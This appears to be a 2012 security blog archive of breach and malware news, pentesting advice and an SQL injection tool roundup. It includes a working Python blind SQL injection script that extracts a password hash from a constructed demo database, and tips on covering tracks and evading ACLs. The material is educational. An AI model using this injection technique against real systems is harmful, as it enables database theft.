Friday, December 21, 2012

Security is Inconvenient, Deal With It!

ZD Net had an article entitled "Kernel vulnerability places Samsung devices at risk" and I thought "so, what's new" until I followed the link to the forum post on xda-developers. Then I just lost it because I'm certain that this is a result of plain and simple laziness.

Here are my arguments for why I think it's laziness. First, this is Samsung we're talking about here; this error should have been caught in code review or QA. Second, according to the first post, the primary users of /dev/exynos-mem are:

graphic usage like camera, graphic memory allocation, hdmi. By activating pid display in kmsg, surfaceflinger does mmap on the device (via one of the three shared libraries above?? I have not seen a reference in the binary to these libraries).


Ideal Skill Set For the Penetration Testing

Based on questions I’ve gotten over the years and specifically in class, I’ve decided that we need to address some basic skills that every penetration tester should have. While we can’t realistically expect everyone to have the exact same skill set, there are some commonalities.


1. Mastery of an operating system. I can’t stress how important it is. So many people want to become hackers or systems security experts, without actually knowing the systems they’re supposed to be hacking or securing. It’s common knowledge that once you’re on a target/victim, you need to somewhat put on the hat of a sysadmin. After all, having root means nothing if you don’t know what to do with root. How can you cover your tracks if you don’t even know where you’ve left tracks? If you don’t know the OS in detail, how can you possibly know everywhere things are logged?


2. Good knowledge of networking and network protocols. Being able to list the OSI model DOES NOT qualify as knowing networking and network protocols. You must know TCP in and out. Not just that it stands for Transmission Control Protocol, but actually know the structure of the packet, know what’s in it, know how it works in detail. A good place to start is TCP/IP Illustrated by W. Richard Stevens (either edition works). Know the difference between TCP and UDP. Understand routing, and be able to describe in detail how a packet gets from one place to another. Know how DNS works, and know it in detail. Understand ARP, how it’s used, why it’s used. Understand DHCP. What’s the process for getting an automatic IP address? What happens when you plug in? What type of traffic does your NIC generate when it’s plugged in and tries to get an automatically assigned address? Is it layer 2 traffic? Layer 3 traffic?


3. If you don’t understand the things in item 2, then you can’t possibly understand how an ARP spoof or a MiTM attack actually works. In short, how can you violate or manipulate a process if you don’t even know how the process works, or worse, you don’t even know the process exists! Which brings me to the next point. In general you should be curious as to how things work. I’ve evaluated some awesome products in the last 10 years, and honestly, after I see one work, the first thing that comes to my mind is “how does it work?”.


4. Learn some basic scripting. Start with something simple like vbs or Bash. As a matter of fact, I’ll be posting a “Using Bash Scripts to Automate Recon” video tonight. So if you don’t have anywhere else to start, you can start there! Eventually you’ll want to graduate from scripting and start learning to actually code/program or in short write basic software (hello world DOES NOT count).


5. Get yourself a basic firewall, and learn how to configure it to block/allow only what you want. Then practice defeating it. You can find cheap used routers and firewalls on eBay, or maybe ask your company for old ones. Start with simple ACLs on a router. Learn how to scan past them using basic IP spoofing and other simple techniques. There’s no better way to understand these concepts than to apply them. Once you’ve mastered this, you can move to a PIX or ASA and start the process over again. Start experimenting with trying to push Unicode through it, and other attacks. Spend time on this site and other places to find info on doing these things. Really the point is to learn to do them.


6. Know some forensics! This will only make you better at covering your tracks. The implications should be obvious.


7. Eventually learn a programming language, then learn a few more. Don’t go and buy a “How to program in C” book or anything like that. Figure out something you want to automate, or think of something simple you’d like to create. For example, a small port scanner. Grab a few other port scanners (like nmap), look at the source code, see if you can figure any of it out. Then ask questions on forums and other places. Trust me, it’ll start off REALLY shaky, but just keep chugging away!


8. Have a desire and drive to learn new stuff. This is a must; it’s probably more important than everything else listed here. You need to be willing to put in some of your own time (time you’re not getting paid for) to really get a handle on things and stay up to date.


9. Learn a little about databases, and how they work. Go download MySQL and read some of the tutorials on how to create simple sample databases. I’m not saying you need to be a DB expert, but knowing the basic constructs helps.


10. Always be willing to interact and share your knowledge with like-minded professionals and other smart people. Some of the most amazing hackers I know have jobs like pizza delivery and janitorial work; one is a marketing exec, another is actually an MD. They do this strictly because they love to. And one thing I see in them all is their excitement and willingness to share what they’ve learned with people who actually care to listen and are interested in the same.


These things should get you started. Let me know if you have questions or comments.


Keatron.

Tuesday, December 18, 2012

Hackers at the Controls

An FBI report (linked here) details what could be seen as the elite hacking sect of Anonymous, Antisec, using a backdoor to compromise an air-conditioning control system in New Jersey.

This leads me to the question of how vulnerable the government and private sectors are to these types of compromises of SCADA and building control systems.

Most hack jobs are attempts at ‘low hanging fruit’ or extraction of data. If the players are looking to ‘step it up’, then the heart of the data centers must be considered.

Data centers, large and small, all require the same components:

- Power
- HVAC (heat exchange)
- Flame Retardant Systems
- Secondary Power (UPS and generators)
- Physical Controls
- Space and Equipment

Responsibility for these may fall under facilities or IT, or a mixture of both, but much of this equipment is vendor supported, which means the organization's own controls go out the window.

Default or low-strength passwords may be common!



Cybercrime Will Eclipse Terrorism

Cybercriminals are becoming a threat that rivals terrorist groups like al Qaeda, according to the nation's top law enforcement official.

"Terrorism does remain the FBI's top priority, but in the not too-distant-future we anticipate that the cyberthreat will pose the greatest threat to our country," FBI Director Robert Mueller told a gathering of security professionals on Thursday at RSA's annual conference in San Francisco.

"Today, terrorists have not used the Internet to launch a full-scale cyberattack, but we cannot underestimate their intent," he said.

In the wake of the Sept. 11 attacks, the FBI invested heavily to develop new skill sets and formed more than 100 joint anti-terrorism task forces with other government agencies, military branches and local law enforcement organizations.



Monday, December 17, 2012

Google.Com Now 'Censors' Explicit Content From Image Searches

Search giant Google has modified its "SafeSearch" feature, which has removed most pornographic, not-safe-for-work (NSFW) or explicit content from its image search results.

First reported on the news-sharing site Reddit, the move has drawn angry reactions from hundreds of users. The new options only appear to affect Google.com for now, whereas other regional sites -- such as Google.co.uk -- have not yet changed. (My search history is not looking good right now.)

Google search users now have to be a little more specific before receiving goods of an explicit nature. For example, if one were to type in a particular sexual act, Google.com will no longer dish up what one was expecting. If users are more specific in what they are after, then it will return what one expected in the first place.

Five Arrested In High-Profile Cyberattacks

NEW YORK (CNN) -- Top members of the computer hacker group "Anonymous" and its offshoots were arrested and charged Tuesday after a wide-ranging investigation that used the help of a group leader who was working as a secret government informant.

Five of the suspects, considered by investigators among the "most sophisticated hackers in the world," were arrested in the United States and Europe and charged in a Manhattan federal court over their alleged role in high-profile cyberattacks against government agencies and large companies, according to an indictment.

A sixth man, Hector Xavier Monsegur, a notorious hacker known as "Sabu," pleaded guilty in August to computer hacking and other crimes.

Friday, December 14, 2012

Google Hacking With GGGoogleScan

GGGoogleScan
GGGoogleScan is a Google scraper which performs automated searches and returns the results of search queries in the form of URLs or hostnames. Datamining Google’s search index is useful for many applications. Despite this, Google makes it difficult for researchers to perform automatic search queries. The aim of GGGoogleScan is to make automated searches possible by avoiding the search activity that is detected as bot behaviour [1]. Basically, we can enumerate hostnames and URLs with the GGGoogleScan tool, which can prove a valuable resource later.

This tool has a number of ways to avoid being detected as a bot; one of them is horizontal searching, where we’re searching for multiple search words in parallel without requesting the contents of, for example, 1-50 results found by that search query. Rather than that, we’re making a large number of search queries, saving the results and only requesting a small number of web pages that were found as a result of scanning.



Thursday, December 13, 2012

Hexed – Working Effectively In The Hex Editor

I love my hex editor! I mean I really do. As reverse engineers and binary explorers, the hex editor is arguably the most used tool for human binary reconnaissance. From format exploration to file rebuilding, it’s the best utility in our toolkit, with a great legacy of its own. From the diverse range of editors to the breadth of features provided, it might seem a little daunting to first timers and redundant to advanced types. It’s my goal in this article to highlight the various features of this mighty tool that might just make your day. Let’s get to it.

What should you expect from your editor?

Locating your bytes:

The main display is always a hex byte representation of the binary file arranged in a tabular fashion.



Google's Android Malware Detection Falls Short

Android appears to be on a trajectory to become the Windows of mobile operating systems, but there's a downside to ubiquity. Rising market share means increasing attention from malware authors.

Sophos, a computer security company, asserts that there is a growing malware problem for Android devices and that Android devices are less safe than iOS or Windows Phone devices. The FBI has noticed too, issuing a warning in October about risks facing Android users.


Tuesday, December 11, 2012

Hacktivist Group Team Ghostshell Takes Credit For Extensive Breach

The hacktivist group Team Ghostshell took credit Monday for the release of 1.6 million accounts and records stolen from government and private organizations covering aerospace, law enforcement, the military, the defense industry and banking.

Among the organizations the group claimed to have stolen information from were NASA's Center For Advanced Engineering, the Department of Homeland Security (DHS) Information Network, the FBI's Washington division in Seattle, the Federal Reserve and Interpol.



Monday, December 10, 2012

China Mafia-Style Hack Attack Drives California Firm to Brink

During his civil lawsuit against the People’s Republic of China, Brian Milburn says he never once saw one of the country’s lawyers. He read no court documents from China’s attorneys because they filed none. The voluminous case record at the U.S. District courthouse in Santa Ana contains a single communication from China: a curt letter to the U.S. State Department, urging that the suit be dismissed. 

That doesn’t mean Milburn’s adversary had no contact with him.

E-Reader Privacy Chart, 2012 Edition

Who's Reading What You're Reading?

E-readers are great toys, but if you are concerned about who is tracking you, do not get one.


Scanning Web Servers With Nikto

Nikto is a tool written in Perl that performs tests against web servers in order to identify potential vulnerabilities. Nikto can be used in web application penetration tests and in some cases can produce juicy results. Specifically, if a system administrator has not configured the web server well, the web server is out of date, or there is a misconfiguration, Nikto is capable of finding it.

For the needs of this article we will use Nikto to scan the web server where DVWA (Damn Vulnerable Web Application) is hosted. Before we start the scan it is always good practice to perform an update to obtain the latest plugins. This can be achieved with the -update parameter.

Thursday, November 29, 2012

Romanian Authorities Dismantle Cybercrime Ring Responsible For $25M Credit Card Fraud

By Lucian Constantin
November 27, 2012 02:24 PM ET

IDG News Service - Romanian law enforcement authorities have dismantled a criminal group that stole credit card data from foreign companies as part of an operation that resulted in fraudulent transactions totaling $25 million.

Officers from the country's organized crime police working with prosecutors from the Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT) executed 36 search warrants on Tuesday at residential addresses in several Romanian cities and arrested 16 individuals suspected of being members of the credit card fraud ring.

According to DIICOT, the group's members gained unauthorized access to computer systems belonging to foreign companies that operate gas stations and grocery stores, and installed computer applications designed to intercept credit card transaction data.



Hackers Hit International Atomic Energy Agency Server

IDG News Service - A group of hackers leaked email contact information of experts working with the International Atomic Energy Agency (IAEA) after breaking into one of the agency's servers.

The group published a list of 167 email addresses along with its manifesto on Sunday in a post on Pastebin.

"Some contact details related to experts working with the IAEA were posted on a hacker site on 25 November 2012," IAEA spokeswoman Gill Tudor said Wednesday in an emailed statement. "The IAEA deeply regrets this publication of information stolen from an old server that was shut down some time ago. In fact, measures had already been taken to address concern over possible vulnerability in this server."


Friday, September 14, 2012

Google Says The Scope Of Drive-by Malware Is 'Significant'

How ironic that Google allows you to initiate a Web search by clicking on a button labeled "I'm Feeling Lucky." The button is supposed to take you to the first Web site that turns up in your search. Instead, it just might take you to malware hell.

In a preliminary report issued by Google in early February (see All Your iFrames Point to Us in the Google blog), researchers reveal the depth of the worldwide malware problem and conclude “the scope of the problem is significant.” This isn’t news if you’ve ever had to clean up the mess left behind after a malware infection. But if you’re feeling fairly confident that you do enough to protect yourself and the other users on your network, this report should open your eyes to the real world, and it’s not pretty.

New Weapon Against Drive-by Downloads Emerges

As more employees visit social networking sites while at work, network managers are seeing a rise in accidental malware infections known as drive-by download attacks.

Cybersecurity researchers trying to stop users from inadvertently compromising their machines have come up with a novel idea: Give them PCs running virtual machine software so they can act as sensors that detect malware infections and prevent them from infecting enterprise networks.

The idea was developed by George Mason University's Center for Secure Information Systems (CSIS) in conjunction with Northrop Grumman Information Systems.

This PCs-as-sensors approach was outlined at the Cyber Infrastructure Protection Conference held at the City College of New York last Friday.


ATM Malware Spreading Around The World

Cash machines around the world are hosting malware that can harvest a person's card details for use in fraud, a situation that could worsen as the malware becomes more sophisticated, according to a security researcher.

Analysts at Trustwave's SpiderLabs research group were surprised earlier this year when they obtained the ATM malware sample from a financial institution in Eastern Europe, said Andrew Henwood, vice president of SpiderLabs' Europe, Middle East and Africa operation. Trustwave does forensic investigations for major credit card companies and financial institutions as well as penetration tests.

"It's the first time we have come across malware of this type," Henwood said.


Wednesday, September 12, 2012

Cyber Criminals Target Travelers

FBI: Guests' Data Collected When They Log Into Hotel Wi-Fi Overseas
(CNN) -- A recent warning from the FBI about hackers targeting guests' data when they log into hotel Wi-Fi overseas was a salient reminder to travelers of the risks to data security on the road.

The alert, from the FBI's Internet Crime Complaint Center, was addressed to U.S. executives, government workers and academics but did not specify a particular country of threat. It warned of a spate of incidents of travelers encountering bogus software update pop-ups when they used hotel internet connections overseas. When they clicked on the "update," malicious software was installed on their computer.

Hotel Wi-Fi connections are particularly risky, said Sian John, UK security strategist at Symantec, because they are often set up without proper security settings. But they are merely one data-security threat among many facing business travelers.


Monday, September 10, 2012

Anonymous Attack Brings Down Tons Of GoDaddy Sites

Today is not a good day for those working behind the scenes at GoDaddy. TechCrunch is reporting that an Anonymous member has brought GoDaddy down and, by extension, has brought down many of the sites GoDaddy hosts. Apparently, the attack was carried out by someone going by the name of “AnonymousOwn3r” on Twitter, and he says that he worked alone in bringing the website hosting service down.

Friday, September 7, 2012

FBI Director: Cybercrime Will Eclipse Terrorism

"Today, terrorists have not used the Internet to launch a full-scale cyberattack, but we cannot underestimate their intent," he said. In the wake of the Sept. 11 attacks, the FBI invested heavily to develop new skill sets and formed more than 100 joint anti-terrorism task forces with other government agencies, military branches and local law enforcement organizations.

Reference: Cybercrime Will Eclipse Terrorism

Monday, July 9, 2012

300,000 Infected Computers to Go Offline Monday

According to a group of security experts formed to combat DNSChanger, between a quarter-million and 300,000 computers, perhaps many more, were still infected as of July 2. 


DNSChanger hijacked users' clicks by modifying their computers' domain name system (DNS) settings to send URL requests to the criminals' own servers, a tactic that shunted victims to hacker-created sites that resembled real domains. 


At one point, as many as 4 million PCs and Macs were infected with the malware, which earned its makers $14 million, U.S. federal authorities have said. Infected machines will lose their link to the Internet at 12:01 a.m. ET Monday, July 9, when replacement DNS servers go dark.



Monday, May 21, 2012

Ads on Wikipedia Can Point to Malware Infection

Every now and then, Wikipedia's popularity and brand are misused by malware peddlers, typosquatters and scammers.

But the fact that the Wikipedia project is funded exclusively by donors and the site never displays ads also makes it a good litmus test for discovering whether one's machine is infected with certain types of malware.

"If you’re seeing advertisements for a for-profit industry or anything but our fundraiser, then your web browser has likely been infected with malware," Wikipedia's Director of Community Advocacy Philippe Beaudette pointed out in a recent blog post.

This usually happens when a specific browser extension has been inadvertently downloaded and installed by the user.

"Ads injected in this manner may be confined to some sites, even just to Wikipedia, or they may show up on all sites you visit," he says. "Browsing through a secure (HTTPS) connection may cause the ads to disappear, but will not fix the underlying problem."

One must disable the extension in question, but even after having done this, other malware could still be hiding on the computer, and then a malware scan is in order.

Beaudette points out that ads seen on Wikipedia's site can have one final source - one that might not be malicious but is still annoying: the users' Internet provider, who injects them into web pages for profit.

Flashback Botmasters Earned Less Than $15K

The researchers initially calculated that a botnet of that size could bring in $10,000 per day to its masters, as the malware's ad-clicking component would intercept browser requests, target search queries made on Google and redirect users to another page of the attacker's choosing. Consequently, the attackers would receive payment for the ad click instead of Google.

Alas for the botmasters, not everything went as planned. They managed to install the ad-clicking component only on some 10,000 of the 600,000+ infected machines because security researchers reacted quickly and took down most of their C&C servers.

"From our analysis we have seen that, for a three-week period starting in April, the botnet displayed over 10 million ads on compromised computers but only a small percentage of users who were shown ads actually clicked them, with close to 400,000 ads being clicked. These numbers earned the attackers $14,000 in these three weeks, although it is worth mentioning that earning the money is only one part of the puzzle—actually collecting that money is another, often more difficult, job," shared Symantec.




Sunday, May 20, 2012

Worm Targets Facebook Users Via PMs


A worm posing as a JPG image has seemingly been spotted propagating on Facebook and through various IM applications. "We recently received reports about private messages found on Facebook and distributing a link, which is a shortened URL pointing to an archive file May09-Picture18.JPG_www.facebook.com.zip," Trend Micro researchers warn. "This archive contains a malicious file named May09-Picture18.JPG_www.facebook.com and uses the extension .COM."

Once the file is run and the worm gains a foothold in the system, it first tries to find and disable antivirus software in order to avoid detection. Then, it contacts a number of websites, and downloads from them another worm.

Zeus Exploits Users of Facebook, Gmail, Hotmail and Yahoo!

Trusteer discovered a series of attacks being carried out by a P2P variant of the Zeus platform against users of Facebook, Google Mail, Hotmail and Yahoo – offering rebates and new security measures.

The scams exploit the trust relationship between users and these well-known service providers, as well as the Visa and MasterCard brands, to steal users’ debit card data.

In the first attack against Facebook, the malware uses a web inject to present the victim with a fraudulent 20% cash back offer by linking their Visa or MasterCard debit card to their Facebook account.




Saturday, May 19, 2012

Cyber Security Still Takes A Backseat For Major Companies

As cyber threats continue to be a nuisance to major companies, senior management has yet to give it the attention it deserves, a recent study finds.

While they are some of the most distinguished enterprises in the world, and considered big targets for cyber attacks, the report indicates that top-level management at the firms still neglect suitable governance over the “security of their digital assets.”




Wireless Tech Makes Health Care Security a 'Major Concern'

The use of wireless technology in the latest medical devices found in hospitals, health clinics and doctor offices has become a major concern of the U.S. Department of Homeland Security (DHS).

In a bulletin issued this month, the DHS warned that while new technology brings efficiency, lower cost and better patient care, it also carries security risks that the multi-trillion-dollar healthcare industry may not be prepared to tackle.

"The communications security of medical devices to protect against theft of medical information and malicious intrusion is now becoming a major concern," the report, entitled "Attack Surface: Healthcare and Public Health Sector," said.




White House’s Cyber Security Official Retiring

The White House’s cybersecurity coordinator said Thursday that he is stepping down at the end of this month after a 2 1/2-year tenure in which the administration has increased its focus on cyber issues but struggled to reach agreement with lawmakers on the best way to protect the nation’s key computer networks from attack.

Howard Schmidt, who oversaw the creation of the White House’s first legislative proposal on Cyber Security, said he is retiring to spend more time with his family and to pursue teaching in the cyber field.


Friday, May 18, 2012

Pre-Boxed Crap

The computer security problems in our country can be easily repaired and monitored. The problem is there are no industry standards for the software we are putting out there, no one is being held accountable, even the automotive industry is finally being held to several safety standards to protect the customers who purchased their vehicles. The way I look at it is we are again, "closing the barn door, after the horse ran away". It costs companies, corporations and individuals mega bucks to fix the software problems after a security incident has happened. Now what would be wrong with security testing the product before it leaves the building??? hmmmm...
...BUTCH


There’s a gap today in requirements. We can quite easily build security into in-house and off-shore developed applications by integrating commonly known requirements.

For example:
  1. We can require that developers not maintain integral state data on the client, to defend against parameter manipulation.
  2. We can require that session ids are always sent over SSL.
  3. We can both require and check for these things before an app is deployed, so that the only things left for crash testing are mistakes that slipped through the cracks, complex domain-specific security flaws, and novel / unique security issues that haven’t been defined yet.

We as an industry have spoken at great length about security in the SDLC, but we’ve only paid marginal attention to secure requirements. It’s time to move on from crash testing.
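The first two requirements above, as an added example that is not part of the original post: a checkout handler that trusts a client-supplied price beside one that keeps the price on the server, and a session cookie emitted without and with the Secure flag. The catalog, prices and form fields are constructed for the demo.

```python
# Added example (not from the post): requirement 1 (no integral state on the
# client) and requirement 2 (session ids only over SSL) shown as a vulnerable
# handler beside its hardened form. Items, prices and fields are constructed.
from decimal import Decimal
from http.cookies import SimpleCookie

# Server-side catalog: the only trustworthy source of prices (constructed data).
CATALOG = {"book": Decimal("19.99"), "headset": Decimal("49.00")}


def checkout_vulnerable(form: dict) -> Decimal:
    """Violates requirement 1: the price is integral state, yet it is read
    back from a client-controlled form field (typically a hidden input)."""
    qty = int(form["qty"])
    return Decimal(form["price"]) * qty      # a tampered price=0.01 is honoured


def checkout_hardened(form: dict) -> Decimal:
    """Keeps integral state on the server: the client may only name the item
    and quantity; the price comes from CATALOG and any extra field is ignored."""
    item = form.get("item")
    if item not in CATALOG:
        raise ValueError("unknown item")
    qty = int(form.get("qty", "0"))
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return CATALOG[item] * qty


def session_cookie_vulnerable(session_id: str) -> str:
    """Violates requirement 2: without the Secure attribute the browser will
    also send the session id over plain HTTP."""
    c = SimpleCookie()
    c["sid"] = session_id
    return c["sid"].OutputString()


def session_cookie_hardened(session_id: str) -> str:
    """Secure restricts the cookie to SSL/TLS; HttpOnly keeps page scripts
    from reading it, which limits what an injected script can steal."""
    c = SimpleCookie()
    c["sid"] = session_id
    c["sid"]["secure"] = True
    c["sid"]["httponly"] = True
    c["sid"]["path"] = "/"
    return c["sid"].OutputString()


if __name__ == "__main__":
    tampered = {"item": "book", "qty": "2", "price": "0.01"}   # constructed form
    print("vulnerable total:", checkout_vulnerable(tampered))   # 0.02
    print("hardened total:  ", checkout_hardened(tampered))     # 39.98
    print(session_cookie_hardened("demo-session-id"))
```

The check in requirement 3 is then mechanical: grep the deployed handlers for prices or roles read from request parameters, and the Set-Cookie headers for a missing Secure attribute.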

Thursday, May 17, 2012

Ninety Percent of HTTPS Websites Insecure

Recently the most popular websites using secure online transactions (Online stores, banks, communication sites, etc.) were tested for security and most did not fare very well.

Of the approximately 200,000 HTTPS SSL encrypted websites tested, only about 10% are properly secured according to the Trustworthy Internet Movement (TIM).

Also, about 75% of the sites are still vulnerable to the BEAST attack.


Why Security Through Obscurity Still Does Not Work


Utah Department of Health officials say the breach, which they suspect involved East European hackers, exposed information about an estimated 780,000 adults and children. That information included 280,000 Social Security numbers.

Recently I provided Howard Anderson at HealthInfosecurity.com with some of my thoughts about the recent Utah Department of Health breach of the files of 900,000 individuals, and counting.

He included some of my thoughts in his blog post, along with thoughts from others. I wanted to provide my full reply here, along with some expanded thoughts.

As background, for those of you who may not have heard of this hack yet, in a nutshell:
The data breach occurred on March 30. A configuration error occurred at the password authentication level. This allowed hacker(s), located in Eastern Europe, to obtain files containing sensitive information by circumventing the Utah Department of Technology Services’ (DTS’s) security system. 


The files were stored on a server that contained Medicaid information at DTS.


Future Security Basics


This incident points out the need for organizations, of all sizes and in all industries, to do the following to help prevent the same type of breach as that within the Utah DTS:


  1. Have well documented systems and applications procedures and supporting standards in place that are consistently followed
  2. Provide training and ongoing awareness for the procedures and standards
  3. Log changes consistently, and have teams responsible for reviewing the logs, and maintaining the logs for an appropriate period of time
  4. Perform ongoing audits to catch such configuration errors
  5. Have a change control process in place to help keep the mistakes of individuals from being put into production
  6. Use intrusion detection systems (IDSs) and intrusion prevention systems (IPSs) to identify inappropriate access as soon as possible
  7. Create and maintain well documented breach detection and response plans
  8. Establish breach response teams and provide them with periodic training and ongoing awareness communications
  9. Engage independent third parties to perform periodic vulnerability scans and penetration tests
  10. Encrypt sensitive data, in transit and at rest in all storage locations. As this incident demonstrates, even if a sensitive file is located on a network behind a firewall, the bad guys may still be able to get to it.

Tuesday, May 15, 2012

Chinese Hackers Took Control of NASA Satellite for 11 Minutes

Hacking is becoming a growing problem on Earth. It may seem strange to mention Earth, as there’s not much to hack outside of our planet’s atmosphere unless you count satellites. Even then, how feasible would it be to gain access to the systems running such devices?

Well, China not only has people working on such things, it has been discovered they actually managed to take control of two NASA satellites for more than 11 minutes.


2012 dubbed 'Year of the Smartphone Hacker'

Smartphone users are at risk of banking Trojans, spyware and infected apps and don't even realize it, say security experts who predict 2012 will be the "Year of the Smartphone Hacker."

Monday, May 14, 2012

Security Professionals Aren’t Immune from Dumbass Moves

Spammers and fraudsters often wiggle into our lives through “social engineering,” pretending to be someone that we think we know.

What are some of the security tricks you’ve fallen for? Fess up in the comments below.
It’s one of the oldest tricks in the book and yet it’s so effective. Guess that’s why it keeps resurfacing. We’ve all seen the bad guys dish out a range of schemes over the years, from using nefarious links embedded in an email to, more recently, social media phishing attacks using these same lethal links in Facebook messages and Tweets.

Hackers Steal $90,000 in Bitcoins

Bitcoin exchange site Bitcoinica suspended its operations on Friday after hackers managed to steal 18,547 bitcoins -- valued at about US $90,000 -- from its online wallet.

The user database probably was compromised as well, Bitcoinica's administrators said in an announcement posted on the site's home page. The information stored in the database included usernames, email addresses and account histories. Account passwords were encrypted in a way that makes it extremely unlikely for them to be cracked, the Bitcoinica team said. However, to be on the safe side, the team advised users to change their passwords on other websites where they might have used them.

Sunday, May 13, 2012

10 SQL Injection Tools

10 SQL Injection Tools For Database Pwnage


Black hat hackers and pen testers alike use these tools to dump data, perform privilege escalations, and effectively take over sensitive databases


BSQL Hacker 
Developed by Portcullis Labs, BSQL Hacker is an automated SQL injection framework that facilitates blind SQL injection, time-based blind SQL injection, deep blind SQL injection and error based SQL injection attacks. Attacks can be automated against Oracle and MySQL databases, with power to automatically extract all database data and schemas.


The Mole 
An open source tool, The Mole can bypass some IPS/IDS systems using generic filters. It is able to detect and exploit injections using only a vulnerable URL and a valid string on the site using union or Boolean query techniques. The command line tool offers support for attacks against MySQL, SQL Server, Postgres and Oracle databases.


Pangolin 
Produced by the same firm that wrote the JSky tool, NOSEC, Pangolin is a thorough SQL injection testing tool with a user-friendly GUI and a wide base of support for just about every database on the market. Primarily used by the white hat community as a comprehensive pen test tool, Pangolin offers its users the capability to create a comprehensive database management system fingerprint, to enumerate users, dump table and column information and run the users' own SQL statements.


Sqlmap 
A self-proclaimed automatic SQL injection and database takeover tool, the open source sqlmap tool sports the ability to attack via five different SQL injection techniques, or directly if the user has DBMS credentials, IP address, port and database name. It can enumerate users and password hashes, with inline support to crack them with a dictionary-based attack, and supports privilege escalation through Metasploit's getsystem command. It offers the ability to dump database tables and, for MySQL, PostgreSQL or SQL Server, to download and upload any file and execute arbitrary code.


Havij 
A popular tool used by black hats worldwide, Havij was developed by Iranian coders who named it for the Farsi word for carrot, a moniker that doubles as slang for the male appendage. With a simple GUI, Havij brags about a success rate of 95 percent at injecting vulnerable targets on MySQL, Oracle, PostgreSQL, MS Access and Sybase databases. In addition to being able to perform a back-end fingerprint, retrieve usernames and password hashes, dump tables and columns, fetch data and run SQL statements on vulnerable systems, it can also access the underlying file system and execute commands on the operating system.


Enema SQLi 
Unlike many automated tools designed for users with less than abundant technical knowledge, Enema isn't autohacking software, according to its developer, "mastermind." As mastermind says, "This is dynamic tool for people, who knows what to do." Grammatical issues notwithstanding, the tool gives users the ability to customize queries and use plugins to automate attacks against SQL Server and MySQL databases, using error-based, Union-based and blind time-based injection attacks.


Sqlninja 
Sqlninja's developer, icesurfer, puts it best explaining his creation, "Take a few new SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have just one of the attack modules of sqlninja!" Targeted against SQL Server environments, the tool offers database fingerprint, privilege escalation, and all the tools necessary to gain remote access of a database vulnerable to injection attacks.


sqlsus 
An open source MySQL injection and takeover tool, sqlsus runs with a command line interface and lets users inject their own SQL queries, download files from the attached Web server, crawl the website for writable directories, clone databases and upload and control backdoors.


Safe3 SQL Injector 
Widely known as one of the easiest to use SQL injection automation tools circulating the Internet, Safe3 SI offers a set of features that enable automatic detection and exploitation of SQL injection flaws and eventual database server takeover. The tool recognizes the database type and finds the best method of SQL injection, with support for blind, error-based, UNION query and force guess injection techniques. It supports MySQL, Oracle, PostgreSQL, SQL Server, Access, SQLite, Firebird, Sybase and SAP MaxDB, with the ability to read, list and write any file when the DBMS is MySQL or SQL Server and support for arbitrary command execution for SQL Server and Oracle DBMS.


SQL Poizon 
A SQL injection scanner/hunter tool, SQL Poizon takes advantage of search engine "dorks" to trawl the Internet for sites with SQL injection vulnerabilities. The tool has a built-in browser and injection builder to carry out and check the impact of an injection. Its simple GUI provides an easy interface to carry out an attack without a deep technical knowledge base.
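Every tool on this list automates the same underlying trick, and the "blind" and "Boolean" modes the descriptions keep mentioning are easier to understand when you see the loop spelled out. The Python below is an added example, not code from any of the tools above: it builds an in-memory SQLite database with a constructed schema (a products table and a users table holding a made-up admin hash), puts a deliberately vulnerable lookup that concatenates user input into its query next to the parameterized version, and then recovers the hidden hash one character at a time by asking the application only true/false questions. The table and column names, the hash value and the page_shows_product oracle are all assumptions for the demo.

```python
import sqlite3
import string


def make_db():
    """Constructed sample database standing in for a web app's back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget")])
    # Made-up hash value; the point is that no page ever displays it.
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"))
    return conn


def vulnerable_lookup(conn, product_id):
    """The bug every tool on this list hunts for: input glued into the SQL."""
    sql = "SELECT name FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, product_id):
    """Same query with a bound parameter; the input can never become SQL."""
    return conn.execute("SELECT name FROM products WHERE id = ?",
                        (product_id,)).fetchall()


def page_shows_product(conn, injected):
    """Boolean oracle: did the 'page' render a product row or not?
    A real tool infers this from the HTTP response (length, a marker
    string, status code); here we look at the row count directly."""
    try:
        return len(vulnerable_lookup(conn, injected)) > 0
    except sqlite3.Error:
        return False  # a SQL error usually renders as an empty/error page


def extract_blind(conn, column, table, where, max_len=64):
    """Boolean-based blind extraction of one hidden value, char by char.

    Each probe appends  AND SUBSTR((subquery), pos, 1) = 'c'  to a
    known-good id, so the product appears only when the guess is right.
    SQLite's default BINARY collation makes the '=' case-sensitive."""
    alphabet = string.ascii_letters + string.digits + "_"
    subquery = f"(SELECT {column} FROM {table} WHERE {where} LIMIT 1)"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = f"1 AND SUBSTR({subquery},{pos},1)='{ch}'"
            if page_shows_product(conn, payload):
                recovered += ch
                break
        else:
            break  # no character matched: we are past the end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("normal:    ", vulnerable_lookup(db, "1"))
    print("tautology: ", vulnerable_lookup(db, "1 OR 1=1"))
    print("hash via blind SQLi:", extract_blind(db, "pw_hash", "users", "username='admin'"))
    print("same payload, parameterized:", safe_lookup(db, "1 OR 1=1"))
```

The "time-based blind" mode several of the tools advertise is the same loop with a different oracle: when the page gives no visible true/false signal, the probe becomes a conditional delay (a SLEEP or heavy query) and the tool measures response time instead of looking at the content. Note that the parameterized lookup returns nothing for the tautology payload because the whole string is compared against the integer column as data, which is the fix these tools are really checking for.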



Stuxnet

Imagine a nefarious computer virus, one some industry experts say may be the most sophisticated piece of malware ever written. Imagine this worm, loaded onto a Siemens Programmable Logic Controller (PLC), creating two hexadecimal words as its output: DEAD F007. Now imagine this piece of malware, Stuxnet -- or something like it -- coming to an industrial plant near you. 

